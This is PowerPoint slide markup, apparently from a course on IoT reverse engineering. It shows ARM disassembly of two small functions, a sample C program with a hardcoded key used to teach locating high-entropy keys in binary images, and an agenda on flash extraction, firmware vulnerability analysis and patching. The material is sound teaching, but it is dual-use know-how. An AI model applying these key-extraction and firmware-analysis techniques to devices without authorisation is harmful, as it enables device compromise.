                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1c:   e51b3008  ldr  r3, [fp, #-8]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>20:   e1a00003  mov  r0, r3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>24:   e24bd000  sub  sp, fp, #0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>28:   e49db004  pop  {fp}   ; (ldr fp, [sp], #4)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2c:   e12fff1e  bx    lr</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFA77095-837F-3341-BB13-509E430FEB48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6217920" y="1745196"/>
            <a:ext cx="6312747" cy="49791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Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000030 &lt;_Z6calleri&gt;:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  30:   e92d4800   push {fp, lr}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  34:   e28db00    add  fp, sp, #4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  38:   e24dd010   sub  sp, sp, #16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  3c:   e50b0010   str  r0, [fp, #-16]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  40:   e51b0010   ldr  r0, [fp, #-16]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  44:   ebfffffe   bl   0 &lt;_Z6calleei&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  48:   e50b0008   str  r0, [fp, #-8]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  4c:   e51b1008   ldr  r1, [fp, #-8]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  50:   e59f000c   ldr  r0, [pc, #12] </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                     ; 64 &lt;_Z6calleri+0x34&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  54:   ebfffffe   bl    0 &lt;printf&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  58:   e1a00000   nop     ; (mov r0, r0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  5c:   e24bd004   sub   sp, fp, #4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  60:   e8bd8800   pop   {fp, pc}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  64:   00000000   andeq r0, r0, r0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1BD7ECA-D3E4-0545-BD53-C87326548AFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3605972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2" y="-79313"/>
            <a:ext cx="11783354"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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1358900"/>
            <a:ext cx="11582400" cy="5144232"/>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Now we’ll find keys (which have high entropy) in an image.  Again we’ll do this in steps, starting on an intel machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Here’s a sample program that includes a key and calls a crypto function on it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>typedef unsigned char byte;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>void ebc_encrypt(byte* key, byte* in, byte* out);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>const int BLOCKSIZE = 16;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>byte my_key[] = {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  0xdb, 0xcc, 0x05, 0x78, 0xe4, 0xfb, 0x50, 0x2b, 0x79, 0xec, 0x0f, 0x67, 0xa9, 0x4e, 0x31, 0x83</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>};</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>void program(int size, byte* plain_text, byte* cipher_text) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  // Assumes input is BLOCKSIZE aligned and an integral multiple of BLOCKSIZE chunks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  while (size &gt; 0) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    ebc_encrypt(my_key, plain_text, cipher_text);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    plain_text += BLOCKSIZE;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    cipher_text += BLOCKSIZE;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    size -= BLOCKSIZE;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>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CA7EB617-A421-8440-AC2A-484955359B27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="216080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59" y="239243"/>
            <a:ext cx="11039566" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IoT reverse engineering, hacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="701087" y="1628590"/>
            <a:ext cx="11310983" cy="4910323"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Arduino, raspberry pi, perf boards</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Disassembly and reverse engineering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Identifying flash chip types and extracting their contents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Analysis of flash image contents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Vulnerability analysis with unpacked firmware image</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Patching firmware, application, OS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Badges and interfaces</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>binwalk</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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED7C07B4-8CD1-7648-9B08-1F9333D118CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6356578" y="4040209"/>
            <a:ext cx="4665756" cy="2378402"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{643A6D1B-255F-CA4F-B00F-2F2B568CD5F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
